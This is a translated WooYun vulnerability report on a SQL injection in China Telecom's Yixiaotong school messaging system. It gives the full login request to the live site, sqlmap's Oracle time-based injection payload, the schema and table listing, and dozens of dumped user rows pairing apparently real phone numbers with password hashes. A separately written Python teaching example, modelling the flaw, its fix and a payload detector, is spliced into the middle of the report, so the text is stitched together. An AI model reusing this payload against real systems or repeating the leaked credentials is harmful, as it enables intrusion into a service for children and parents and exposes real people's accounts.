
Vulnerability Summary

Defect ID: wooyun-2014-080739

Title: China Telecom, SQL injection in a regional 翼校通 (Yixiaotong) system

Vendor: China Telecom

Author: 小饼仔

Submitted: 2014-10-27 12:03

Fixed: 2014-12-11 12:06

Published: 2014-12-11 12:06

Type: SQL injection

Severity: High

Self-assessed rank: 20

Status: handed over to a third-party partner organisation (CNCERT, the National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability Details

Disclosure status:

2014-10-27: details sent to the vendor, awaiting vendor handling
2014-10-31: vendor confirmed; details visible to the vendor only
2014-11-10: details opened to core white hats and domain experts
2014-11-20: details opened to regular white hats
2014-11-30: details opened to intern white hats
2014-12-11: details opened to the public

Brief description:

Seeing these kids reminds me of my own lost youth, sigh~
The system lets you send SMS to parents and teachers, assign homework to the kids and so on; it seems quite fun.

Detailed description:

URL: http://www.qzyixiaotong.com/ischool/login.jsp

(screenshot: 翼校通.png)


SQL injection at the login form. POST request:

POST /ischool/LoginCheck HTTP/1.1
Host: www.qzyixiaotong.com
Proxy-Connection: keep-alive
Content-Length: 50
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://www.qzyixiaotong.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36
Content-Type: application/x-www-form-urlencoded
DNT: 1
Referer: http://www.qzyixiaotong.com/ischool/login.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.6,en;q=0.4
Cookie: JSESSIONID=90D8FE278C1BF3B9909C6C2CEE5F0E8A; staff_code=aaa; role_type=T; password=; last_login_date=2014/10/20/18; today_login_times=0; JSESSIONID=2DF962D771E9A829EC1BAF07F6EF54E9
RA-Ver: 2.7.0
RA-Sid: 65E7C870-20141014-044958-a23ba1-b78bcc
ROLETYPE=T&USERNAME=aaa&school_id=&PWD=aaa&v_code=


sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: USERNAME
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: ROLETYPE=T&USERNAME=a' AND 5464=DBMS_PIPE.RECEIVE_MESSAGE(CHR(105)||CHR(117)||CHR(77)||CHR(119),5) AND 'bqDj'='bqDj&school_id=&PWD=a&v_code=
---
back-end DBMS: Oracle
current user: 'BASEDBA'
current schema (equivalent to database on Oracle): 'BASEDBA'
current user is DBA: True
available databases [17]:
[*] BASEDBA
[*] CENTERBASE
[*] CTXSYS
[*] DBSNMP
[*] DMSYS
[*] EXFSYS
[*] MDSYS
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] SCOTT
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TSMSYS
[*] WMSYS
[*] XDB
Database: BASEDBA
[424 tables]
+-------------------------------+
| LANGUAGE |
| ACTIVITY_INFO |
| ACTIVITY_ORDER |
| ACTIVITY_PAYMENT |
| ACTIVITY_PHONE |
| ACTIVITY_PLAN |
| ACTIVITY_USER_CHANGE_LOG |
| ADS_INFO |
| AD_LOGIN_HIS |
| APP_INFO |
| AREA_INFO |
| ARTICLE |
| ARTICLE_DOC |
| BBS_DOC |
| BBS_REPLY |
| BBS_TOPIC |
| CHAT_MESSAGE |
| CHILD_CLASS |
| CHILD_INFO |
| CLASS_INFO |
| CLIENT_MODULE_DEF |
| CLIENT_MODULE_DETAIL |
| CLIENT_MODULE_INFO |
| CLIENT_MODULE_INFO_EXCULDE |
| CLIENT_MODULE_INFO_INCLUDE |
| CLIENT_MODULE_LOG |
| CLIENT_MODULE_LOG_1402 |
| CLIENT_MODULE_LOG_1403 |
| CLIENT_MODULE_LOG_1404 |
| CLIENT_MODULE_LOG_1405 |
| CLIENT_MODULE_LOG_1406 |
| COMPANY_ACCT |
| COMPANY_INFO |
| COMPOSITION |
| COMPOSITION_DOC |
| CREDIT_CHANGE_FAIL |
| CREDIT_CHANGE_LOG |
| CREDIT_CHANGE_LOG_HIS |
| CREDIT_DJ_REMARK |
| CREDIT_NEW_SCORE_1309 |
| CREDIT_TEACHER_MON |
| CREDIT_TEACHER_MON_BAK1008 |
| CREDIT_TEACHER_MON_LOG |
| CTK_SCHOOL_INFO |
| DOC_LOCATE |
| EDUCATION_COLUMN |
| EDUCATION_LOG |
| EDUCATION_ORG |
| ESSAY_APPRAISE |
| ESSAY_AUTH_LOG |
| ESSAY_AWARD |
| ESSAY_GROUP_INFO |
| ESSAY_INFO |
| ESSAY_INFO_20130524 |
| ESSAY_INFO_DEL |
| ESSAY_INFO_DEL_LOG |
| ESSAY_OP_LOG |
| ESSAY_SCHOOL_INFO |
| ESSAY_SCHOOL_TYPE |
| ESSAY_USER_INFO |
| ESSAY_VOTE |
| EXAM_SCORE |
| EXAM_SCORE_DETAIL |
| EXAM_SCORE_DETAIL_IMP_CHECK |
| FEEDBACK_INFO |
| GLOBAL_EYE_INFO |
| GLOBAL_EYE_LOGININFO |
| GLOBAL_EYE_WATCH_LOG |
| HOMEWORK |
| HOMEWORK_CLASS |
| HOMEWORK_COMMENT |
| HOMEWORK_DOC |
| HOMEWORK_REPLY |
| HONOR_CATALOG |
| HONOR_DOC |
| HONOR_PRAISE_USER |
| HONOR_REPLY |
| HONOR_ROLL |
| IBABY_EXEC_FUNC |
| IBABY_USER_FUNC |
| IBABY_VOTE |
| IBABY_VOTE_OPTION |
| IBABY_VOTE_RESULT |
| IBABY_VOTE_USER |
| IBABY_YIXIN_AUTHCODE |
| IBABY_YIXIN_LOG |
| IBABY_YIXIN_TEAM_MEMBER |
| IBABY_YIXIN_TOKEN |
| IMAN_EXEC_FUNC |
| IMAN_SERV_CONSUME |
| IMAN_SERV_CONSUME_BAK |
| IMAN_SERV_CONSUME_DETAIL |
| IMAN_SERV_CONSUME_DETAIL_BAK |
| IMAN_SERV_CONSUME_IMP_CHECK |
| IMAN_SERV_CONSUME_YX_HIS |
| IMAN_SMS_HIS_TASK |
| IMAN_SMS_HIS_TASK_1401 |
| IMAN_SMS_HIS_TASK_1402 |
| IMAN_SMS_HIS_TASK_1403 |
| IMAN_SMS_HIS_TASK_1404 |
| IMAN_SMS_HIS_TASK_1405 |
| IMAN_SMS_HIS_TASK_1406 |
| IMAN_SMS_HIS_TASK_1407 |
| IMAN_SMS_HIS_TASK_1408 |
| IMAN_SMS_HIS_TEL |
| IMAN_SMS_HIS_TEL_1401 |
| IMAN_SMS_HIS_TEL_1402 |
| IMAN_SMS_HIS_TEL_1403 |
| IMAN_SMS_HIS_TEL_1404 |
| IMAN_SMS_HIS_TEL_1405 |
| IMAN_SMS_HIS_TEL_1406 |
| IMAN_SMS_HIS_TEL_1407 |
| IMAN_SMS_HIS_TEL_1408 |
| IMAN_STAFF_FUNC |
| IMAN_YX_IMP_LOG |
| INTER_JXT |
| INTER_JXT_0001 |
| INTER_JXT_0003 |
| INTER_JXT_1009 |
| INTER_JXT_1010 |
| INTER_JXT_1201 |
| INTER_JXT_1401 |
| INTER_JXT_1402 |
| INTER_JXT_1403 |
| INTER_JXT_1404 |
| INTER_JXT_1405 |
| INTER_JXT_1406 |
| INTER_JXT_1407 |
| INTER_JXT_1408 |
| INTER_JXT_BREAK |
| INTER_JXT_DEVICE |
| INTER_JXT_KQ |
| INTER_JXT_KQ_1009 |
| INTER_JXT_KQ_1010 |
| INTER_JXT_KQ_1401 |
| INTER_JXT_KQ_1402 |
| INTER_JXT_KQ_1403 |
| INTER_JXT_KQ_1404 |
| INTER_JXT_KQ_1405 |
| INTER_JXT_KQ_1406 |
| INTER_JXT_KQ_1407 |
| INTER_JXT_KQ_1408 |
| INTER_JXT_KQ_CLASS |
| INTER_JXT_KQ_CLASS_1401 |
| INTER_JXT_KQ_CLASS_1402 |
| INTER_JXT_KQ_CLASS_1403 |
| INTER_JXT_KQ_CLASS_1404 |
| INTER_JXT_KQ_CLASS_1405 |
| INTER_JXT_KQ_CLASS_1406 |
| INTER_JXT_KQ_CLASS_1407 |
| INTER_JXT_KQ_CLASS_1408 |
| INTER_JXT_TIME_CFG |
| INTER_JXT_TIME_CFG_EX |
| INTER_JXT_TIME_TITLE |
| JJ_VIDEO_ESSAY_INFO |
| JJ_VIDEO_ESSAY_VOTE |
| LANGUAGE_DOC |
| LGL_AX_CHANGED_PSD |
| LGL_CLASS46_BAK |
| LGL_CREDIT_TEACHER_MON |
| LGL_CREDIT_TEACHER_MON_140127 |
| LGL_ESSAY_SCHOOL |
| LGL_JGXX_TEACHER |
| LGL_SCHOOL_STAT_1307 |
| LGL_SMS_0411 |
| LGL_SMS_TEACHER_1401 |
| LGL_SMS_TEL_1401 |
| LGL_TEST |
| LGL_USER_INFO140605 |
| LGL_VALID_USER |
| MEMBER_INFO |
| MEMBER_INFO_IMP_CHECK |
| MEMBER_INFO_LOG |
| MNT_PROCESS_INFO |
| MSG_POOL_PHONE_HIS |
| MSG_RECEIVE |
| MSG_RECEIVE_2014 |
| MSG_SEND |
| MSG_SEND_BAK |
| MSG_SEND_LOG |
| MSG_SEND_LOG_1401 |
| MSG_SEND_LOG_1402 |
| MSG_SEND_LOG_1403 |
| MSG_SEND_LOG_1404 |
| MSG_SEND_LOG_1405 |
| MSG_SEND_LOG_1406 |
| MSG_SEND_LOG_1407 |
| MSG_SEND_LOG_1408 |
| MSG_SEND_SPLIT_LOG |
| MSG_SEND_SPLIT_LOG_1401 |
| MSG_SEND_SPLIT_LOG_1402 |
| MSG_SEND_SPLIT_LOG_1403 |
| MSG_SEND_SPLIT_LOG_1404 |
| MSG_SEND_SPLIT_LOG_1405 |
| MSG_SEND_SPLIT_LOG_1406 |
| MSG_SEND_SPLIT_LOG_1407 |
| MSG_SEND_SPLIT_LOG_1408 |
| MSG_SMGP_RESP |
| MSG_SMGP_RESP_1401 |
| MSG_SMGP_RESP_1402 |
| MSG_SMGP_RESP_1403 |
| MSG_SMGP_RESP_1404 |
| MSG_SMGP_RESP_1405 |
| MSG_SMGP_RESP_1406 |
| MSG_SUBMITRESP_DEL |
| NA_ESSAY_INFO |
| NA_ESSAY_SCHOOL_INFO |
| NA_ESSAY_SCHOOL_TYPE |
| NA_ESSAY_VOTE |
| NEWS_DOC |
| NEWS_INFO |
| NEWS_INFO_BAK130125 |
| NOTICE |
| NOTIFY_DOC |
| NOTIFY_INFO |
| NOTIFY_USER |
| NOTIFY_USER_1220 |
| NOTIFY_USER_CTK |
| ORDER_CHECK_CFG |
| PARENT_CHILD |
| PAY_FEE |
| PAY_INFORM |
| PAY_MERCHANT |
| PAY_ORDER |
| PAY_RECORD_LOG |
| PB_ACTIVE_201401 |
| PB_ACTIVE_201402 |
| PB_BJ_INCREASE |
| PB_CHILD_CLASS_UPGRADE_2014 |
| PB_CHILD_INFO_UPGRADE_2014 |
| PB_CLASS_INFO_UPGRADE_2014 |
| PB_CRM_JZ |
| PB_DJ |
| PB_DJ_LOG_X_20140102 |
| PB_JFDJ_201308 |
| PB_JFDJ_201309 |
| PB_JFDJ_201310 |
| PB_JFDJ_201311 |
| PB_JFDJ_201312 |
| PB_JFDJ_201401 |
| PB_JFDJ_201402 |
| PB_JFDJ_201403 |
| PB_JFDJ_201404 |
| PB_JFDJ_201405 |
| PB_JFDJ_201406 |
| PB_JFDJ_201407 |
| PB_JFDJ_201408 |
| PB_JFDJ_201409 |
| PB_LOGIN_201212 |
| PB_LOGIN_USER |
| PB_MEMBER_INFO_CLASS_X |
| PB_MEMBER_INFO_UPGRADE_2014 |
| PB_MEMBER_NOACCT_2014 |
| PB_NJ_INCREASE |
| PB_PARENT_CHILD_UPGRADE_2014 |
| PB_PUSH_SCHEDULE |
| PB_QKHD_SERV |
| PB_QKHD_SERV_TMP |
| PB_SCHOOL_EXPORT |
| PB_SCHOOL_EXPORT_TASK |
| PB_SCHOOL_KHBBM |
| PB_SCHOOL_TMP |
| PB_SCHOOL_UPGRADE_2013 |
| PB_SCHOOL_UPGRADE_2014 |
| PB_SERV_CONSUME |
| PB_SERV_CONSUME_DETAIL |
| PB_TEACHER_INFO_UPGRADE_2014 |
| PB_TEACHER_MASTER |
| PB_TEACHER_SMS |
| PB_TEST |
| PB_TMP |
| PB_USER_A |
| PB_USER_INFO_UPGRADE_2014 |
| PB_XYQS |
| PB_XYQS_2 |
| PB_YC_DJ_201312 |
| PB_YC_DJ_TEL |
| PB_YC_NBR |
| PB_YDT_USER_201401 |
| PB_YXT_JZ |
| PB_YXT_JZ_BAK |
| PB_YXT_JZ_INCREASE |
| PHOTO_CATALOG |
| PHOTO_DOC |
| PHOTO_PRAISE_USER |
| PHOTO_REPLY |
| PHOTO_SHOW |
| PHOTO_SHOW_BACKUP_20131223 |
| PUSH_SCHEDULE |
| QGDEYU_ESSAY_INFO |
| QGDEYU_ESSAY_REPLY |
| QGDEYU_ESSAY_SCHOOL_TYPE |
| QGDEYU_ESSAY_VOTE |
| QJ_DETAIL |
| QJ_INFO |
| QJ_OPT_LOG |
| QRY_FORM_DEFINE |
| QZ_SCHOOL_INFO |
| SANI_DOC |
| SANI_INFO |
| SCHOOL_HOMEPAGE |
| SCHOOL_INFO |
| SERVICE_INFO |
| SERVICE_ORDER |
| SHARE_TOPIC_LOG |
| SMS_GET_MESSAGE |
| SMS_GET_MESSAGE_2014 |
| SMS_HIS_TASK |
| SMS_HIS_TASK_1401 |
| SMS_HIS_TASK_1402 |
| SMS_HIS_TASK_1403 |
| SMS_HIS_TASK_1404 |
| SMS_HIS_TASK_1405 |
| SMS_HIS_TASK_1406 |
| SMS_HIS_TASK_1407 |
| SMS_HIS_TASK_1408 |
| SMS_HIS_TEL |
| SMS_HIS_TEL_1401 |
| SMS_HIS_TEL_1402 |
| SMS_HIS_TEL_1403 |
| SMS_HIS_TEL_1404 |
| SMS_HIS_TEL_1405 |
| SMS_HIS_TEL_1406 |
| SMS_HIS_TEL_1407 |
| SMS_HIS_TEL_1408 |
| SMS_HIS_TEL_KAKA |
| SMS_HIS_TEL_KAKA_BACKUP_OK |
| SMS_HIS_TEL_KAKA_BAK |
| SMS_MESSAGE |
| SMS_MESSAGE_LOG |
| SMS_MESSAGE_LOG_1401 |
| SMS_MESSAGE_LOG_1402 |
| SMS_MESSAGE_LOG_1403 |
| SMS_MESSAGE_LOG_1404 |
| SMS_MESSAGE_LOG_1405 |
| SMS_MESSAGE_LOG_1406 |
| SMS_MESSAGE_LOG_1407 |
| SMS_MESSAGE_LOG_1408 |
| SMS_SHARE_LOG |
| SPEECH_CATALOG |
| SPEECH_DOC |
| SPEECH_PRAISE_USER |
| SPEECH_REPLY |
| SPEECH_SCORE_USER |
| SPEECH_SHOW |
| STAFF_INFO |
| STATE |
| STAT_CLIENT_MODULE_USE |
| STAT_CREDIT_CHANGE |
| STAT_LOG |
| STAT_LOG_DETAIL |
| STAT_P_USE_DETAIL |
| STAT_P_USE_V |
| STAT_SMS_LOG |
| STAT_SYSTEM_P_USE_DETAIL |
| STAT_SYSTEM_USE |
| STAT_SYSTEM_USE_DETAIL |
| STAT_SYSTEM_USE_M |
| STAT_SYSTEM_USE_MON |
| STAT_SYSTEM_USE_SUB_MON |
| STAT_SYSTEM_USE_V |
| STAT_SYSTEM_USE_V_SUB |
| STAT_SYSTEM_USE_V_SUB_DETAIL |
| STAT_TEMP_UID |
| STAT_USER_DETAIL |
| STAT_USER_DETAIL_V |
| STAT_USER_LOG_T |
| STAT_USER_LOG_V |
| STAT_USER_OPEN_DETAIL |
| STAT_USER_OPEN_REPORT |
| STAT_USER_REPORT |
| SUB_BUREAU_INFO |
| SYS_EXPORT_SCHEMA_01 |
| TEACHER_INFO |
| TEACHER_INFO_LOG |
| TEACHING_PLAN |
| TEACHING_PLAN_DOC |
| TEACHING_PLAN_REPLY |
| TEACHING_RESOURCES |
| TEACHING_RESOURCES_DOC |
| TEACHING_RESOURCES_REPLY |
| TELECOM_HEAD |
| THIRD_PART_COMPONENT |
| THIRD_PART_INFO |
| THIRD_PART_LOG |
| THIRD_PART_PAY |
| TMP_TEACHER |
| TOPIC_CATALOG |
| TRAINING_ORG |
| TXL_LOG_MAIN |
| TXL_LOG_MEMBER_INFO |
| TXL_LOG_TEACHER_INFO |
| TXL_LOG_USER_INFO |
| TXL_OPT_LOG |
| TY_PHONE_INFO |
| USER_CREDIT |
| USER_FAVORITES |
| USER_INFO |
| USER_INFO_LOG |
| USER_LOG |
| USER_LOG_2012 |
| USER_LOG_2013 |
| USER_LOG_2014 |
| USER_LOG_HIS |
| USER_NOTICE |
| USER_OP_LOG |
| USER_REGISTER_LOG |
| USER_SMS_CNT_CHECK |
| VOTE_CLASS |
| V_TEACHER_STAR |
| WORKS_CATALOG |
| WORKS_DOC |
| WORKS_PRAISE_USER |
| WORKS_REPLY |
| WORKS_SCORE_USER |
| WORKS_SHOW |
| WORKS_SHOW_BACKUP_20131223 |
| XLFDZ_VIDEO_ESSAY_INFO |
| YXT_AREA_USE_STAT |
| YXT_SCHOOL_USE_STAT |
| YXT_TEACHER_VIDEO_ESSAY_INFO |
| YXT_TEACHER_VIDEO_ESSAY_VOTE |
| YZF_PAY_RESULT |
| YZF_PAY_WEB_WAP |
+-------------------------------+
Data from table USER_INFO:
PASSWD USERNAME
eb0011d581f919b2 18986596000
8e808e563f5e8db5 18906993168
70466bc88a146309 18906993286
21d02b46441460c2 18906993286
2679d967ddb3e63a 18959768778
61676f67a3dc0e19 18960321709
7cff82628d333fe3 15396339913
15ef83f404736014 15359834444
2bb166bc482c2911 18959931177
67f60b68b54300d0 15396339917
6606d71ddfee6b90 18959836073
89e330416dd25ba6 18959939527
bba549255c838658 18959935839
7f16e8d750c0a60b 18059502198
a5c6eaf7c32c2277 15392202205
b462b7e23d9e3376 18960327706
2e0833aa78345465 15396339912
e2c3e6d04ef42a8a 18965501686
227a231f0cd6ea8b 15359639968
ac6276818b4d61a8 18965532999
1612196d836e5185 18965660888
ea3142d6a1c5c2f1 18965677000
91e3d58660ca5262 18959990013
84da1358967082ac 18959990000
ce194d64a7a9fafa 15375836368
f3d79b984eab7b31 18965530560
1ab39c0c028ab32e 18960332307
c7921cfadfbd0c52 18959990015
1db38112f25b1da9 18905953678
509764ba55af120e 18965877666
f4e61bc6eb548732 15306956228
04afda0289fdb44d 15396525337
cea8d00ab468eff6 15375872752
65e43161991de9a2 18065311988
7179a751d5f73177 18159201819
cf184fa4ccb2208d 15359521252
7a6c755b092d8b4d 15305958119
bc8a4d5a889df3d0 18159202909
700b276e3430d540 18900315600
ebe6ccc9820a754e 18016687669
908e5228c7fad5ca 18016687618
887adc9e7c9de999 18900315168
5689b788155f895e 18900315258
8fb699ee36dbbf0a 18900315698
dd75728bd819fdb6 18016689770
aa3dc5b9773fe337 15906081056
eb97433ece762883 18905061923
43905834f09d94f3 18059993316
8e28743dab8d54ff 18120698551
a36f7a508dd4a38a 18059993299
fb4da3b9164cc83c 18059993280
1b8cc188c52d8e66 18059993309
dfc9e9237af88fb7 18059993312
9b5bac589752201b 18059993315
90867bf8909a54da 18059993283
5c6e9a840d245d59 18059993273
3c2e6968fc4849af 18059993289
fe69d6125544a964 18059993302
d75e9b2954a21ea0 18059993303
a53e0cfe8a5109cc 18059993313
ad8e9844b6069965 18059993298
f11ab0cb8d03b3da 18959839368
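The finding above is the classic pattern of a login handler splicing the USERNAME field into its SQL text, which is why sqlmap's quote-terminated Oracle payload changes the statement instead of being compared as a string. The following Python model is an added example, not code from the report or from the 翼校通 application: it uses an in-memory SQLite table as a stand-in for the Oracle USER_INFO table (assuming only the USERNAME and PASSWD columns visible in the dump, with constructed sample rows), shows the vulnerable concatenation beside the bind-parameter form, and adds a small detector that flags a URL-encoded login body carrying the DBMS_PIPE.RECEIVE_MESSAGE marker from the sqlmap output. On Oracle the payload would delay the response by 5 seconds; SQLite has no DBMS_PIPE, so the rewritten statement fails to parse, which still demonstrates that the input reached the SQL parser.

```python
import re
import sqlite3
from urllib.parse import parse_qs

# Constructed sample rows standing in for the USER_INFO table named on the page.
# The phone numbers and hash strings below are made up for this example.
SAMPLE_USERS = [
    ("18900000001", "0123456789abcdef"),
    ("18900000002", "fedcba9876543210"),
]

# The injected request body exactly as sqlmap reported it on the page.
PAGE_BODY = ("ROLETYPE=T&USERNAME=a' AND 5464=DBMS_PIPE.RECEIVE_MESSAGE("
             "CHR(105)||CHR(117)||CHR(77)||CHR(119),5) AND 'bqDj'='bqDj"
             "&school_id=&PWD=a&v_code=")
# The USERNAME value alone, as the login handler would receive it.
PAGE_PAYLOAD = parse_qs(PAGE_BODY, keep_blank_values=True)["USERNAME"][0]


def make_db():
    """In-memory SQLite stand-in for the Oracle schema.
    Assumption: USER_INFO has the USERNAME and PASSWD columns shown in the dump."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE USER_INFO (USERNAME TEXT, PASSWD TEXT)")
    conn.executemany("INSERT INTO USER_INFO VALUES (?, ?)", SAMPLE_USERS)
    return conn


def login_check_vulnerable(conn, username, pwd):
    """The defect class behind the finding: request fields spliced into the SQL text.
    A quote in the input closes the literal and the remainder is parsed as SQL."""
    sql = ("SELECT USERNAME FROM USER_INFO WHERE USERNAME = '" + username
           + "' AND PASSWD = '" + pwd + "'")
    return conn.execute(sql).fetchone()


def login_check_safe(conn, username, pwd):
    """Hardened form: a fixed statement with bind parameters, so the input is only
    ever compared as data. The equivalent in a JSP/Java handler such as the page's
    /ischool/LoginCheck (assumption about its stack) is PreparedStatement."""
    sql = "SELECT USERNAME FROM USER_INFO WHERE USERNAME = ? AND PASSWD = ?"
    return conn.execute(sql, (username, pwd)).fetchone()


def statement_was_rewritten(conn, username, pwd):
    """Run the vulnerable check and report whether the input altered the statement.
    SQLite has no DBMS_PIPE, so the page's payload fails to parse here instead of
    sleeping for 5 seconds as it would on Oracle; either way the input was not data."""
    try:
        login_check_vulnerable(conn, username, pwd)
        return False
    except sqlite3.OperationalError:
        return True


# Detection: the page's payload carries a recognisable Oracle time-based marker.
TIME_BASED_MARKER = re.compile(r"DBMS_PIPE\s*\.\s*RECEIVE_MESSAGE\s*\(", re.IGNORECASE)


def flag_login_body(body):
    """Return the names of form fields in a URL-encoded POST body whose values carry
    the DBMS_PIPE.RECEIVE_MESSAGE marker seen in the sqlmap output; [] if none."""
    fields = parse_qs(body, keep_blank_values=True)
    return sorted(name for name, values in fields.items()
                  if any(TIME_BASED_MARKER.search(v) for v in values))


if __name__ == "__main__":
    db = make_db()
    print(login_check_safe(db, "18900000001", "0123456789abcdef"))  # ('18900000001',)
    print(login_check_safe(db, PAGE_PAYLOAD, "a"))                    # None
    print(statement_was_rewritten(db, PAGE_PAYLOAD, "a"))             # True
    print(flag_login_body("ROLETYPE=T&USERNAME=aaa&school_id=&PWD=aaa&v_code="))  # []
    print(flag_login_body(PAGE_BODY))                                 # ['USERNAME']
```

The parameterised check returns no row for the payload because the whole string, quotes included, is compared against USERNAME; the concatenated version hands the same string to the SQL parser. The detector is a signature for the specific payload recorded here and complements, rather than replaces, the bind-parameter fix: a WAF rule can be bypassed, a fixed statement cannot be rewritten.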

Proof of vulnerability:

Fix recommendation:

You know what to do.

Copyright notice: when reposting, credit the source: 小饼仔@乌云


Vulnerability Response

Vendor response:

Severity: High

Vulnerability rank: 12

Confirmed: 2014-10-31 17:52

Vendor reply:

Latest status:

None yet